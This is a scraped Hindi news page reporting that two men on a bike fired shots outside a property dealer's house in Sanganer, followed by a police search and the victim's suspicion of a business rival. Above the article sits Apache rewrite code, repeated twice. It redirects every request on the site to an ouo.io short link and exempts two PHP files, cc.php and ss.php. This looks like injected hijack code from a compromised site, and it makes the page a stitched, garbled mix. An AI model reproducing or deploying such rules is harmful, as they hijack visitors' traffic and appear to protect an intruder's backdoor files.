
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 292
Next सांगानेर इलाके में स्थित तारों की कूट में रहने वाले प्रॉपर्टी डीलर के घर पर शनिवार देर रात बाइक सवार दो बदमाशों ने फायरिंग की । गोलियों की आवाज से इलाके में दहशत फैल गई सूचना पर पहुंची । पुलिस ने नाकाबंदी कराई लेकिन बाइक सवार बदमाशों का कोई सुराग नहीं लगा ।
पुलिस ने बताया कि तारों की कूट सूर्य नगर में चंद्रमोहन बढ़ाया परिवार के साथ रहते हैं चंद्रमोहन प्रॉपर्टी डीलर है और प्राइवेट फाइनेंस का काम करते हैं रात करीब साढ़े ग्यारह बजे घर के बाहर बाइक सवार दो बदमाश पहुंचे जिन्होंने देसी पिस्टल से घर के मुख्य गेट के पास दो फायर किए दोनों राउंड दीवार में जा घुसे । गोली चलने की आवाज से इलाके में दहशत फैल गई जिसके बाद बदमाश तेजी से बाइक पर फरार हो गए सूचना पर पुलिस आला अधिकारी मौके पर पहुंचे और एफएसएल टीम की मदद से साक्ष्य जुटाए । पुलिस ने वारदात स्थल के पास लगे सीसीटीवी कैमरे की फुटेज खंगाली।
जिसमें बाइक सवार बदमाशों की करतूत कैद है पुलिस हेलमेट लगाए कर वारदात को अंजाम देकर भागे बाइक सवार बदमाशों की तलाश कर रही है । पीड़ित ने पूर्व में साथी कारोबारी प्रदीप पर शक जाहिर कर मामला दर्ज कराया है कि लेनदेन को लेकर प्रदीप से अन बन चल रही है। जो पिछले कई दिनों से जान से मारने की धमकी देने के साथ ही लड़कों को भेज कर धमका रहा है।